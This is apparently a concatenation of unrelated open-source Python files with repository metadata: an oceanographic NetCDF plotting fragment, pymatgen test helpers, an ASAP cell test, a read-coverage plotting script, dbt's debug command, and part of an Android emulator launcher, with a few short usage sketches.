# write to NetCDF
outfile = 'data/NCEPNCAR_' + args.MooringID + '_' + str(yy) + '_cf.nc'
print "Writing to Epic NetCDF " + outfile
write2epic_cf( outfile, station_name[0], stn1_data['time'], stn1_modelpt, [stn1_uwnd,stn1_vwind,stn1_2mair])
if args.plot:
(topoin, elats, elons) = etopo5_data()
fig = plt.figure()
ax = plt.subplot(111)
m = Basemap(resolution='i',projection='merc', llcrnrlat=45,
urcrnrlat=65,llcrnrlon=-180,urcrnrlon=-155, lat_ts=60)
# Mooring Data
x_moor, y_moor = m(-1. * sta_long[0],sta_lat[0])
x_close, y_close = m(stn1_modelpt[1], stn1_modelpt[0])
#ETOPO 5 contour data
ex, ey = m(elons, elats)
CS = m.contourf(ex,ey,topoin, levels=range(250,5000,250), cmap='gray_r', alpha=.75) #colors='black'
CS = m.contour(ex,ey,topoin, levels=range(250,5000,250), linewidths=0.2, colors='black', alpha=.75) #
CS = m.contour(ex,ey,topoin, levels=[-1000, -200, -100], linestyle='--', linewidths=0.2, colors='black', alpha=.75) #
#plot points
m.scatter(x_close,y_close,20,marker='+',color='b')
m.scatter(x_moor,y_moor,20,marker='o',color='g')
m.drawcountries(linewidth=0.5)
m.drawcoastlines(linewidth=0.5)
m.drawparallels(np.arange(55,75,5.),labels=[1,0,0,0],color='black',dashes=[1,1],labelstyle='+/-',linewidth=0.2) # draw parallels
m.drawmeridians(np.arange(-180,-145,5.),labels=[0,0,0,1],color='black',dashes=[1,1],labelstyle='+/-',linewidth=0.2) # draw meridians
#m.fillcontinents(color='black')
DefaultSize = fig.get_size_inches()
fig.set_size_inches( (DefaultSize[0], DefaultSize[1]) )
plt.savefig('images/'+args.MooringID+'.png', bbox_inches='tight', dpi = (100))
plt.close()
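The nearest-grid-point lookup above relies on sphered.nearest_point from the calc package. As a hedged sketch of the underlying haversine idea (an illustrative helper, not the sphered API):

import numpy as np

def nearest_grid_point(lat0, lon0, lats, lons, radius_km=6371.0):
    # Great-circle distance from (lat0, lon0) to every node of a lat/lon grid,
    # returning the indices of the closest node.
    lat0, lon0 = np.radians(lat0), np.radians(lon0)
    glat, glon = np.meshgrid(np.radians(lats), np.radians(lons), indexing='ij')
    dlat, dlon = glat - lat0, glon - lon0
    a = np.sin(dlat / 2) ** 2 + np.cos(lat0) * np.cos(glat) * np.sin(dlon / 2) ** 2
    dist = 2 * radius_km * np.arcsin(np.sqrt(a))
    j, k = np.unravel_index(np.argmin(dist), dist.shape)
    return j, k  # indices into lats, lons

# j, k = nearest_grid_point(55.0, -165.0, lats=[50, 55, 60], lons=[-170, -165, -160])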
|
shaunwbell/FOCI_Analysis
|
NCEP_WindsSFCtemp_Station.py
|
Python
|
mit
| 9,719
|
[
"NetCDF"
] |
3cf9a8a82c81b86847b9445a78b247ca14367720d0b49ead7683eee4e2b859b5
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import unittest
import tempfile
import numpy.testing.utils as nptu
from six.moves import zip
from io import open
import os
import json
from monty.json import MontyDecoder
from monty.serialization import loadfn
from monty.json import MSONable
from monty.dev import requires
from pymatgen import SETTINGS, MPRester
"""
Common test support for pymatgen test scripts.
This single module should provide all the common functionality for pymatgen
tests in a single location, so that test scripts can just import it and work
right away.
"""
class PymatgenTest(unittest.TestCase):
"""
Extends unittest.TestCase with functions (taken from numpy.testing.utils)
that support the comparison of arrays.
"""
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
STRUCTURES_DIR = os.path.join(MODULE_DIR, "structures")
"""
Dict for test structures to aid testing.
"""
TEST_STRUCTURES = {}
for fn in os.listdir(STRUCTURES_DIR):
TEST_STRUCTURES[fn.rsplit(".", 1)[0]] = loadfn(os.path.join(
STRUCTURES_DIR, fn), cls=MontyDecoder)
@classmethod
def get_structure(cls, name):
return cls.TEST_STRUCTURES[name].copy()
@classmethod
@requires(SETTINGS.get("PMG_MAPI_KEY"), "PMG_MAPI_KEY needs to be set.")
def get_mp_structure(cls, mpid):
m = MPRester()
return m.get_structure_by_material_id(mpid)
@staticmethod
def assertArrayAlmostEqual(actual, desired, decimal=7, err_msg='',
verbose=True):
"""
Tests if two arrays are almost equal to a tolerance. The CamelCase
naming is so that it is consistent with standard unittest methods.
"""
return nptu.assert_almost_equal(actual, desired, decimal, err_msg,
verbose)
@staticmethod
def assertArrayEqual(actual, desired, err_msg='', verbose=True):
"""
Tests if two arrays are equal. The CamelCase naming is so that it is
consistent with standard unittest methods.
"""
return nptu.assert_equal(actual, desired, err_msg=err_msg,
verbose=verbose)
def serialize_with_pickle(self, objects, protocols=None, test_eq=True):
"""
Test whether the object(s) can be serialized and deserialized with
pickle. This method tries to serialize the objects with pickle and the
protocols specified in input. Then it deserializes the pickle format
and compares the two objects with the __eq__ operator if
test_eq == True.
Args:
objects: Object or list of objects.
protocols: List of pickle protocols to test. If protocols is None,
HIGHEST_PROTOCOL is tested.
Returns:
Nested list with the objects deserialized with the specified
protocols.
"""
# Use the python version so that we get the traceback in case of errors
import pickle as pickle
from pymatgen.serializers.pickle_coders import pmg_pickle_load, \
pmg_pickle_dump
# Build a list even when we receive a single object.
got_single_object = False
if not isinstance(objects, (list, tuple)):
got_single_object = True
objects = [objects]
if protocols is None:
# protocols = set([0, 1, 2] + [pickle.HIGHEST_PROTOCOL])
protocols = [pickle.HIGHEST_PROTOCOL]
# This list will contain the objects deserialized with the different
# protocols.
objects_by_protocol, errors = [], []
for protocol in protocols:
# Serialize and deserialize the object.
mode = "wb"
fd, tmpfile = tempfile.mkstemp(text="b" not in mode)
try:
with open(tmpfile, mode) as fh:
pmg_pickle_dump(objects, fh, protocol=protocol)
except Exception as exc:
errors.append("pickle.dump with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
try:
with open(tmpfile, "rb") as fh:
new_objects = pmg_pickle_load(fh)
except Exception as exc:
errors.append("pickle.load with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
# Test for equality
if test_eq:
for old_obj, new_obj in zip(objects, new_objects):
self.assertEqual(old_obj, new_obj)
# Save the deserialized objects and test for equality.
objects_by_protocol.append(new_objects)
if errors:
raise ValueError("\n".join(errors))
# Return nested list so that client code can perform additional tests.
if got_single_object:
return [o[0] for o in objects_by_protocol]
else:
return objects_by_protocol
def tmpfile_write(self, string):
"""
Write string to a temporary file. Returns the name of the temporary
file.
"""
fd, tmpfile = tempfile.mkstemp(text=True)
with open(tmpfile, "w") as fh:
fh.write(string)
return tmpfile
def assertMSONable(self, obj, test_if_subclass=True):
"""
Tests if obj is MSONable and tries to verify whether the contract is
fulfilled.
By default, the method tests whether obj is an instance of MSONable.
This check can be deactivated by setting test_if_subclass to False.
"""
if test_if_subclass:
self.assertIsInstance(obj, MSONable)
self.assertDictEqual(obj.as_dict(), obj.__class__.from_dict(
obj.as_dict()).as_dict())
json.loads(obj.to_json(), cls=MontyDecoder)
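A hypothetical usage sketch of serialize_with_pickle in a test case; the structure name "Si" is assumed to be a file present under STRUCTURES_DIR:

import unittest
from pymatgen.util.testing import PymatgenTest

class PickleRoundTripTest(PymatgenTest):
    def test_structure_pickles(self):
        s = self.get_structure("Si")
        # serialize_with_pickle already asserts equality (test_eq=True) and
        # returns one deserialized copy per protocol tested.
        copies = self.serialize_with_pickle(s)
        self.assertEqual(copies[0], s)

if __name__ == "__main__":
    unittest.main()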
|
xhqu1981/pymatgen
|
pymatgen/util/testing.py
|
Python
|
mit
| 6,039
|
[
"pymatgen"
] |
5978bd4d39eb24576b9d6c4c573d10908c2677e2ffb758bed0e72c222fe8faa7
|
# coding=utf-8
import os
import platform
import sys
from typing import Optional, Dict, Any, List
from dbt.logger import GLOBAL_LOGGER as logger
import dbt.clients.system
import dbt.config
import dbt.utils
import dbt.exceptions
from dbt.links import ProfileConfigDocs
from dbt.adapters.factory import get_adapter, register_adapter
from dbt.version import get_installed_version
from dbt.config import Project, Profile
from dbt.config.renderer import DbtProjectYamlRenderer, ProfileRenderer
from dbt.context.base import generate_base_context
from dbt.context.target import generate_target_context
from dbt.clients.yaml_helper import load_yaml_text
from dbt.ui.printer import green, red
from dbt.task.base import BaseTask, get_nearest_project_dir
PROFILE_DIR_MESSAGE = """To view your profiles.yml file, run:
{open_cmd} {profiles_dir}"""
ONLY_PROFILE_MESSAGE = '''
A `dbt_project.yml` file was not found in this directory.
Using the only profile `{}`.
'''.lstrip()
MULTIPLE_PROFILE_MESSAGE = '''
A `dbt_project.yml` file was not found in this directory.
dbt found the following profiles:
{}
To debug one of these profiles, run:
dbt debug --profile [profile-name]
'''.lstrip()
COULD_NOT_CONNECT_MESSAGE = '''
dbt was unable to connect to the specified database.
The database returned the following error:
>{err}
Check your database credentials and try again. For more information, visit:
{url}
'''.lstrip()
MISSING_PROFILE_MESSAGE = '''
dbt looked for a profiles.yml file in {path}, but did
not find one. For more information on configuring your profile, consult the
documentation:
{url}
'''.lstrip()
FILE_NOT_FOUND = 'file not found'
class QueryCommentedProfile(Profile):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.query_comment = None
class DebugTask(BaseTask):
def __init__(self, args, config):
super().__init__(args, config)
self.profiles_dir = getattr(self.args, 'profiles_dir',
dbt.config.PROFILES_DIR)
self.profile_path = os.path.join(self.profiles_dir, 'profiles.yml')
try:
self.project_dir = get_nearest_project_dir(self.args)
except dbt.exceptions.Exception:
# we probably couldn't find a project directory. Set project dir
# to whatever was given, or default to the current directory.
if args.project_dir:
self.project_dir = args.project_dir
else:
self.project_dir = os.getcwd()
self.project_path = os.path.join(self.project_dir, 'dbt_project.yml')
self.cli_vars = dbt.utils.parse_cli_vars(
getattr(self.args, 'vars', '{}')
)
# set by _load_*
self.profile: Optional[Profile] = None
self.profile_fail_details = ''
self.raw_profile_data: Optional[Dict[str, Any]] = None
self.profile_name: Optional[str] = None
self.project: Optional[Project] = None
self.project_fail_details = ''
self.messages: List[str] = []
@property
def project_profile(self):
if self.project is None:
return None
return self.project.profile_name
def path_info(self):
open_cmd = dbt.clients.system.open_dir_cmd()
message = PROFILE_DIR_MESSAGE.format(
open_cmd=open_cmd,
profiles_dir=self.profiles_dir
)
logger.info(message)
def run(self):
if self.args.config_dir:
self.path_info()
return
version = get_installed_version().to_version_string(skip_matcher=True)
print('dbt version: {}'.format(version))
print('python version: {}'.format(sys.version.split()[0]))
print('python path: {}'.format(sys.executable))
print('os info: {}'.format(platform.platform()))
print('Using profiles.yml file at {}'.format(self.profile_path))
print('Using dbt_project.yml file at {}'.format(self.project_path))
print('')
self.test_configuration()
self.test_dependencies()
self.test_connection()
for message in self.messages:
print(message)
print('')
def _load_project(self):
if not os.path.exists(self.project_path):
self.project_fail_details = FILE_NOT_FOUND
return red('ERROR not found')
if self.profile is None:
ctx = generate_base_context(self.cli_vars)
else:
ctx = generate_target_context(self.profile, self.cli_vars)
renderer = DbtProjectYamlRenderer(ctx)
try:
self.project = Project.from_project_root(
self.project_dir, renderer
)
except dbt.exceptions.DbtConfigError as exc:
self.project_fail_details = str(exc)
return red('ERROR invalid')
return green('OK found and valid')
def _profile_found(self):
if not self.raw_profile_data:
return red('ERROR not found')
assert self.raw_profile_data is not None
if self.profile_name in self.raw_profile_data:
return green('OK found')
else:
return red('ERROR not found')
def _target_found(self):
requirements = (self.raw_profile_data and self.profile_name and
self.target_name)
if not requirements:
return red('ERROR not found')
# mypy appeasement, we checked just above
assert self.raw_profile_data is not None
assert self.profile_name is not None
assert self.target_name is not None
if self.profile_name not in self.raw_profile_data:
return red('ERROR not found')
profiles = self.raw_profile_data[self.profile_name]['outputs']
if self.target_name not in profiles:
return red('ERROR not found')
return green('OK found')
def _choose_profile_names(self) -> Optional[List[str]]:
project_profile: Optional[str] = None
if os.path.exists(self.project_path):
try:
partial = Project.partial_load(
os.path.dirname(self.project_path)
)
renderer = DbtProjectYamlRenderer(
generate_base_context(self.cli_vars)
)
project_profile = partial.render_profile_name(renderer)
except dbt.exceptions.DbtProjectError:
pass
args_profile: Optional[str] = getattr(self.args, 'profile', None)
try:
return [Profile.pick_profile_name(args_profile, project_profile)]
except dbt.exceptions.DbtConfigError:
pass
# try to guess
profiles = []
if self.raw_profile_data:
profiles = [k for k in self.raw_profile_data if k != 'config']
if project_profile is None:
self.messages.append('Could not load dbt_project.yml')
elif len(profiles) == 0:
self.messages.append('The profiles.yml has no profiles')
elif len(profiles) == 1:
self.messages.append(ONLY_PROFILE_MESSAGE.format(profiles[0]))
else:
self.messages.append(MULTIPLE_PROFILE_MESSAGE.format(
'\n'.join(' - {}'.format(o) for o in profiles)
))
return profiles
def _choose_target_name(self, profile_name: str):
has_raw_profile = (
self.raw_profile_data is not None and
profile_name in self.raw_profile_data
)
if not has_raw_profile:
return None
# mypy appeasement, we checked just above
assert self.raw_profile_data is not None
raw_profile = self.raw_profile_data[profile_name]
renderer = ProfileRenderer(generate_base_context(self.cli_vars))
target_name, _ = Profile.render_profile(
raw_profile=raw_profile,
profile_name=profile_name,
target_override=getattr(self.args, 'target', None),
renderer=renderer
)
return target_name
def _load_profile(self):
if not os.path.exists(self.profile_path):
self.profile_fail_details = FILE_NOT_FOUND
self.messages.append(MISSING_PROFILE_MESSAGE.format(
path=self.profile_path, url=ProfileConfigDocs
))
return red('ERROR not found')
try:
raw_profile_data = load_yaml_text(
dbt.clients.system.load_file_contents(self.profile_path)
)
except Exception:
pass # we'll report this when we try to load the profile for real
else:
if isinstance(raw_profile_data, dict):
self.raw_profile_data = raw_profile_data
profile_errors = []
profile_names = self._choose_profile_names()
renderer = ProfileRenderer(generate_base_context(self.cli_vars))
for profile_name in profile_names:
try:
profile: Profile = QueryCommentedProfile.render_from_args(
self.args, renderer, profile_name
)
except dbt.exceptions.DbtConfigError as exc:
profile_errors.append(str(exc))
else:
if len(profile_names) == 1:
# if a profile was specified, set it on the task
self.target_name = self._choose_target_name(profile_name)
self.profile = profile
if profile_errors:
self.profile_fail_details = '\n\n'.join(profile_errors)
return red('ERROR invalid')
return green('OK found and valid')
def test_git(self):
try:
dbt.clients.system.run_cmd(os.getcwd(), ['git', '--help'])
except dbt.exceptions.ExecutableError as exc:
self.messages.append('Error from git --help: {!s}'.format(exc))
return red('ERROR')
return green('OK found')
def test_dependencies(self):
print('Required dependencies:')
print(' - git [{}]'.format(self.test_git()))
print('')
def test_configuration(self):
profile_status = self._load_profile()
project_status = self._load_project()
print('Configuration:')
print(' profiles.yml file [{}]'.format(profile_status))
print(' dbt_project.yml file [{}]'.format(project_status))
# skip profile stuff if we can't find a profile name
if self.profile_name is not None:
print(' profile: {} [{}]'.format(self.profile_name,
self._profile_found()))
print(' target: {} [{}]'.format(self.target_name,
self._target_found()))
print('')
self._log_project_fail()
self._log_profile_fail()
def _log_project_fail(self):
if not self.project_fail_details:
return
if self.project_fail_details == FILE_NOT_FOUND:
return
print('Project loading failed for the following reason:')
print(self.project_fail_details)
print('')
def _log_profile_fail(self):
if not self.profile_fail_details:
return
if self.profile_fail_details == FILE_NOT_FOUND:
return
print('Profile loading failed for the following reason:')
print(self.profile_fail_details)
print('')
@staticmethod
def attempt_connection(profile):
"""Return a string containing the error message, or None if there was
no error.
"""
register_adapter(profile)
adapter = get_adapter(profile)
try:
with adapter.connection_named('debug'):
adapter.execute('select 1 as id')
except Exception as exc:
return COULD_NOT_CONNECT_MESSAGE.format(
err=str(exc),
url=ProfileConfigDocs,
)
return None
def _connection_result(self):
result = self.attempt_connection(self.profile)
if result is not None:
self.messages.append(result)
return red('ERROR')
return green('OK connection ok')
def test_connection(self):
if not self.profile:
return
print('Connection:')
for k, v in self.profile.credentials.connection_info():
print(' {}: {}'.format(k, v))
print(' Connection test: {}'.format(self._connection_result()))
print('')
@classmethod
def validate_connection(cls, target_dict):
"""Validate a connection dictionary. On error, raises a DbtConfigError.
"""
target_name = 'test'
# make a fake profile that we can parse
profile_data = {
'outputs': {
target_name: target_dict,
},
}
# this will raise a DbtConfigError on failure
profile = Profile.from_raw_profile_info(
raw_profile=profile_data,
profile_name='',
target_override=target_name,
renderer=ProfileRenderer(generate_base_context({})),
)
result = cls.attempt_connection(profile)
if result is not None:
raise dbt.exceptions.DbtProfileError(
result,
result_type='connection_failure'
)
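A hedged sketch of calling validate_connection directly; the target keys shown are typical for a postgres adapter and are assumptions, not taken from this file:

from dbt.task.debug import DebugTask
import dbt.exceptions

# Hypothetical postgres target dict; swap in your own credentials.
target = {
    'type': 'postgres',
    'host': 'localhost',
    'port': 5432,
    'user': 'analyst',
    'pass': 'secret',
    'dbname': 'analytics',
    'schema': 'public',
    'threads': 1,
}
try:
    DebugTask.validate_connection(target)
    print('connection ok')
except dbt.exceptions.DbtProfileError as exc:
    print('connection failed: {}'.format(exc))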
|
fishtown-analytics/dbt
|
core/dbt/task/debug.py
|
Python
|
apache-2.0
| 13,454
|
[
"VisIt"
] |
7e41cb858ae5701931a0d58e107395eebe2841911ee75f6803b5082f8583491d
|
# Checks for Ticket #11
from asap3 import *
from ase.lattice.cubic import FaceCenteredCubic
from asap3.testtools import ReportTest
print "Test for Ticket #11: https://trac.fysik.dtu.dk/projects/Asap/ticket/11"
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(6,6,6),
symbol="Cu")
atoms.set_calculator(EMT())
r = atoms.get_positions()
print "Orig position", r[-1]
uc = atoms.get_cell()
print uc
r[-1] = 1.51*uc[2]
atoms.set_positions(r)
print atoms.get_potential_energy()
p1 = atoms.get_positions()[-1]
print "p1:", p1
atoms.set_cell(uc, scale_atoms=True)
print atoms.get_potential_energy()
p2 = atoms.get_positions()[-1]
print "p2:", p2
atoms.set_cell(uc, scale_atoms=False)
print atoms.get_potential_energy()
p3 = atoms.get_positions()[-1]
print "p3:", p3
ReportTest("p2 equals p1", p2[2], p1[2], 1e-6)
ReportTest("p3 equals p1", p3[2], p1[2], 1e-6)
ReportTest.Summary()
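For reference, a plain-ASE sketch of the set_cell semantics this ticket exercises (assuming only ase is installed): with scale_atoms=True positions follow the cell, with scale_atoms=False they stay fixed.

from ase import Atoms

a = Atoms('Cu', positions=[[1.0, 0.0, 0.0]], cell=[2.0, 2.0, 2.0], pbc=True)
a.set_cell([4.0, 4.0, 4.0], scale_atoms=True)
print(a.positions[0])   # [2. 0. 0.]  scaled with the cell
a.set_cell([2.0, 2.0, 2.0], scale_atoms=False)
print(a.positions[0])   # [2. 0. 0.]  unchanged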
|
auag92/n2dm
|
Asap-3.8.4/Test/ChangeUnitCell.py
|
Python
|
mit
| 928
|
[
"ASE"
] |
0947e0e963651d954137b9169afb870bda0f5318f585965230522569026e83ff
|
#!/usr/bin/env python3
"""
INPUT
Expected input file format (pileup):
Each line consists of 5 (or optionally 6) tab-separated columns:
1. Sequence identifier
2. Position in sequence (starting from 1)
3. Reference nucleotide at that position
4. Number of aligned reads covering that position (depth of coverage)
5. Bases at that position from aligned reads
6. Quality of those bases (OPTIONAL)
In my testing, this was generated like this:
samtools mpileup -f Trinity.fasta XUMTA_20131112.bowtie.sorted.mappedonly.bam > XUMTA_20131112.bowtie.sorted.mappedonly.mpileup
OUTPUT
The X and Y sizes of the resulting image are a product of the --mol_size_limit and --mol_bin_size
parameters.
If you pass a value of 'plot' to the -o parameter it will invoke the interactive plot viewer rather
than writing an output file. (You can still save a file from within the viewer)
"""
import argparse
import numpy as np
from collections import defaultdict
import matplotlib.pyplot as plt
from biocode import utils
def main():
parser = argparse.ArgumentParser( description='Generates a figure showing coverage/abundance vs. molecule size.')
## output file to be written
parser.add_argument('-i', '--input_file', type=str, required=True, help='Path to an input pileup file' )
parser.add_argument('-f', '--fasta_file', type=str, required=True, help='Path to the FASTA file of reference molecules' )
parser.add_argument('-o', '--output_file', type=str, required=True, help='Path to an output file to be created' )
parser.add_argument('-s', '--mol_size_limit', type=int, required=False, default=5000, help='Results for molecules over this size will be grouped together' )
parser.add_argument('-b', '--mol_bin_size', type=int, required=False, default=10, help='Set the binning resolution of the transcript size axis')
args = parser.parse_args()
## first, we need a collection of the FASTA data and the molecule lengths
molecules = utils.fasta_dict_from_file(args.fasta_file)
## data points for plotting
# structure like this:
# 500 = { 30 => 2 }
# which means: There were 2 transcripts with median coverage of 30 and length between 500 and 500+mol_bin_size
data_bins = defaultdict(lambda: defaultdict(int))
current_molecule_id = None
current_molecule_coverages = list()
## These files are usually huge. For scalability, operations performed within this
# loop should be limited.
for line in open(args.input_file):
cols = line.split("\t")
if current_molecule_id is None:
current_molecule_id = cols[0]
current_molecule_coverages = [0] * len(molecules[cols[0]]['s'])
if cols[0] != current_molecule_id:
mol_length_bin = int(len(molecules[current_molecule_id]['s']) / args.mol_bin_size)
median_cov = np.median(current_molecule_coverages)
data_bins[mol_length_bin][median_cov] += 1
print("DEBUG: molecule {0} appeared to be {1} bp in length with median coverage of {2}".format(current_molecule_id, len(molecules[current_molecule_id]['s']), median_cov))
# reset
current_molecule_id = cols[0]
current_molecule_coverages = [0] * len(molecules[cols[0]]['s'])
try:
current_molecule_coverages[int(cols[1]) - 1] = int(cols[3])
except IndexError:
print("ERROR: pileup file reports position {0} coverage but transcript {1} is only {2} bp in length".format(cols[1], current_molecule_id, len(molecules[cols[0]]['s'])) )
# don't forget the last one
mol_length_bin = int(len(molecules[cols[0]]['s']) / args.mol_bin_size)
median_cov = np.median(current_molecule_coverages)
data_bins[mol_length_bin][median_cov] += 1
## now generate the plot data - x,y positions and radii
x = list()
y = list()
r = list()
for bin_size in data_bins:
for cov in data_bins[bin_size]:
x.append(bin_size)
y.append(cov)
r.append(data_bins[bin_size][cov])
plt.xlabel('Molecule length')
plt.ylabel('Median depth of coverage')
#plt.xlim(0,2000)
#plt.ylim(0,500)
plt.scatter(x, y, s=r, alpha=0.5)
if args.output_file == 'plot':
plt.show()
else:
plt.savefig(args.output_file)
if __name__ == '__main__':
main()
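A tiny illustrative sketch of the per-molecule median-coverage computation on three fabricated pileup lines for a 5 bp molecule (positions without aligned reads stay at 0):

import numpy as np

pileup_lines = [
    "mol1\t1\tA\t4\t....",
    "mol1\t2\tC\t7\t.......",
    "mol1\t4\tG\t2\t..",
]
coverages = [0] * 5  # one slot per base of the molecule
for line in pileup_lines:
    cols = line.split("\t")
    coverages[int(cols[1]) - 1] = int(cols[3])
print(np.median(coverages))  # 2.0, the median of [4, 7, 0, 2, 0]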
|
jorvis/biocode
|
sandbox/jorvis/generate_read_coverage_figure.py
|
Python
|
mit
| 4,414
|
[
"Bowtie"
] |
95e424674eab37f5ca1dd49e526c7816cd890ebbf338725436376c53ffa7e39f
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides an interface to start and stop Android emulator.
Emulator: The class provides the methods to launch/shutdown the emulator with
the android virtual device named 'avd_armeabi' .
"""
import logging
import os
import signal
import subprocess
import time
# TODO(craigdh): Move these pylib dependencies to pylib/utils/.
from xysec_adb.pylib import android_commands
from xysec_adb.pylib import cmd_helper
from xysec_adb.pylib import constants
from xysec_adb.pylib import pexpect
from xysec_adb.pylib.device import device_utils
from xysec_adb.pylib.utils import time_profile
import errors
import run_command
# SD card size
SDCARD_SIZE = '512M'
# Template used to generate config.ini files for the emulator
CONFIG_TEMPLATE = """avd.ini.encoding=ISO-8859-1
hw.dPad=no
hw.lcd.density=320
sdcard.size=512M
hw.cpu.arch={hw.cpu.arch}
hw.device.hash=-708107041
hw.camera.back=none
disk.dataPartition.size=800M
hw.gpu.enabled=yes
skin.path=720x1280
skin.dynamic=yes
hw.keyboard=yes
hw.ramSize=1024
hw.device.manufacturer=Google
hw.sdCard=yes
hw.mainKeys=no
hw.accelerometer=yes
skin.name=720x1280
abi.type={abi.type}
hw.trackBall=no
hw.device.name=Galaxy Nexus
hw.battery=yes
hw.sensors.proximity=yes
image.sysdir.1=system-images/android-{api.level}/{abi.type}/
hw.sensors.orientation=yes
hw.audioInput=yes
hw.camera.front=none
hw.gps=yes
vm.heapSize=128
{extras}"""
CONFIG_REPLACEMENTS = {
'x86': {
'{hw.cpu.arch}': 'x86',
'{abi.type}': 'x86',
'{extras}': ''
},
'arm': {
'{hw.cpu.arch}': 'arm',
'{abi.type}': 'armeabi-v7a',
'{extras}': 'hw.cpu.model=cortex-a8\n'
},
'mips': {
'{hw.cpu.arch}': 'mips',
'{abi.type}': 'mips',
'{extras}': ''
}
}
class EmulatorLaunchException(Exception):
"""Emulator failed to launch."""
pass
def _KillAllEmulators():
"""Kill all running emulators that look like ones we started.
There are odd 'sticky' cases where there can be no emulator process
running but a device slot is taken. A little bot trouble and
we're out of room forever.
"""
emulators = android_commands.GetAttachedDevices(hardware=False)
if not emulators:
return
for emu_name in emulators:
cmd_helper.RunCmd(['adb', '-s', emu_name, 'emu', 'kill'])
logging.info('Emulator killing is async; give a few seconds for all to die.')
for _ in range(5):
if not android_commands.GetAttachedDevices(hardware=False):
return
time.sleep(1)
def DeleteAllTempAVDs():
"""Delete all temporary AVDs which are created for tests.
If the test exits abnormally, some temporary AVDs created during testing may
be left on the system. Clean these AVDs.
"""
avds = device_utils.GetAVDs()
if not avds:
return
for avd_name in avds:
if 'run_tests_avd' in avd_name:
cmd = ['android', '-s', 'delete', 'avd', '--name', avd_name]
cmd_helper.RunCmd(cmd)
logging.info('Delete AVD %s' % avd_name)
class PortPool(object):
"""Pool for emulator port starting position that changes over time."""
_port_min = 5554
_port_max = 5585
_port_current_index = 0
@classmethod
def port_range(cls):
"""Return a range of valid ports for emulator use.
The port must be an even number between 5554 and 5584. Sometimes
a killed emulator "hangs on" to a port long enough to prevent
relaunch. This is especially true on slow machines (like a bot).
Cycling through a port start position helps make us resilient."""
ports = range(cls._port_min, cls._port_max, 2)
n = cls._port_current_index
cls._port_current_index = (n + 1) % len(ports)
return ports[n:] + ports[:n]
def _GetAvailablePort():
"""Returns an available TCP port for the console."""
used_ports = []
emulators = android_commands.GetAttachedDevices(hardware=False)
for emulator in emulators:
used_ports.append(emulator.split('-')[1])
for port in PortPool.port_range():
if str(port) not in used_ports:
return port
def LaunchTempEmulators(emulator_count, abi, api_level, wait_for_boot=True):
"""Create and launch temporary emulators and wait for them to boot.
Args:
emulator_count: number of emulators to launch.
abi: the emulator target platform
api_level: the api level (e.g., 19 for Android v4.4 - KitKat release)
wait_for_boot: whether or not to wait for emulators to boot up
Returns:
List of emulators.
"""
emulators = []
for n in xrange(emulator_count):
t = time_profile.TimeProfile('Emulator launch %d' % n)
# Creates a temporary AVD.
avd_name = 'run_tests_avd_%d' % n
logging.info('Emulator launch %d with avd_name=%s and api=%d',
n, avd_name, api_level)
emulator = Emulator(avd_name, abi)
emulator.CreateAVD(api_level)
emulator.Launch(kill_all_emulators=n == 0)
t.Stop()
emulators.append(emulator)
# Wait for all emulators to boot completed.
if wait_for_boot:
for emulator in emulators:
emulator.ConfirmLaunch(True)
return emulators
def LaunchEmulator(avd_name, abi):
"""Launch an existing emulator with name avd_name.
Args:
avd_name: name of existing emulator
abi: the emulator target platform
Returns:
emulator object.
"""
logging.info('Specified emulator named avd_name=%s launched', avd_name)
emulator = Emulator(avd_name, abi)
emulator.Launch(kill_all_emulators=True)
emulator.ConfirmLaunch(True)
return emulator
class Emulator(object):
"""Provides the methods to launch/shutdown the emulator.
The emulator has the android virtual device named 'avd_armeabi'.
The emulator could use any even TCP port between 5554 and 5584 for the
console communication, and this port will be part of the device name like
'emulator-5554'. Assume this is always true, as the device name is the id of the
emulator managed by this class.
Attributes:
emulator: Path of Android's emulator tool.
popen: Popen object of the running emulator process.
device: Device name of this emulator.
"""
# Signals we listen for to kill the emulator on
_SIGNALS = (signal.SIGINT, signal.SIGHUP)
# Time to wait for an emulator launch, in seconds. This includes
# the time to launch the emulator and a wait-for-device command.
_LAUNCH_TIMEOUT = 120
# Timeout interval of wait-for-device command before bouncing to a
# process life check.
_WAITFORDEVICE_TIMEOUT = 5
# Time to wait for a "wait for boot complete" (property set on device).
_WAITFORBOOT_TIMEOUT = 300
def __init__(self, avd_name, abi):
"""Init an Emulator.
Args:
avd_name: name of the AVD to create
abi: target platform for the emulator being created (unrecognized values fall back to x86 in CreateAVD)
"""
android_sdk_root = os.path.join(constants.EMULATOR_SDK_ROOT, 'sdk')
self.emulator = os.path.join(android_sdk_root, 'tools', 'emulator')
self.android = os.path.join(android_sdk_root, 'tools', 'android')
self.popen = None
self.device_serial = None
self.abi = abi
self.avd_name = avd_name
@staticmethod
def _DeviceName():
"""Return our device name."""
port = _GetAvailablePort()
return ('emulator-%d' % port, port)
def CreateAVD(self, api_level):
"""Creates an AVD with the given name.
Args:
api_level: the api level of the image
Return avd_name.
"""
if self.abi == 'arm':
abi_option = 'armeabi-v7a'
elif self.abi == 'mips':
abi_option = 'mips'
else:
abi_option = 'x86'
api_target = 'android-%s' % api_level
avd_command = [
self.android,
'--silent',
'create', 'avd',
'--name', self.avd_name,
'--abi', abi_option,
'--target', api_target,
'--sdcard', SDCARD_SIZE,
'--force',
]
avd_cmd_str = ' '.join(avd_command)
logging.info('Create AVD command: %s', avd_cmd_str)
avd_process = pexpect.spawn(avd_cmd_str)
# Instead of creating a custom profile, we overwrite config files.
avd_process.expect('Do you wish to create a custom hardware profile')
avd_process.sendline('no\n')
avd_process.expect('Created AVD \'%s\'' % self.avd_name)
# Replace current configuration with default Galaxy Nexus config.
avds_dir = os.path.join(os.path.expanduser('~'), '.android', 'avd')
ini_file = os.path.join(avds_dir, '%s.ini' % self.avd_name)
new_config_ini = os.path.join(avds_dir, '%s.avd' % self.avd_name,
'config.ini')
# Remove config files with defaults to replace with Google's GN settings.
os.unlink(ini_file)
os.unlink(new_config_ini)
# Create new configuration files with Galaxy Nexus by Google settings.
with open(ini_file, 'w') as new_ini:
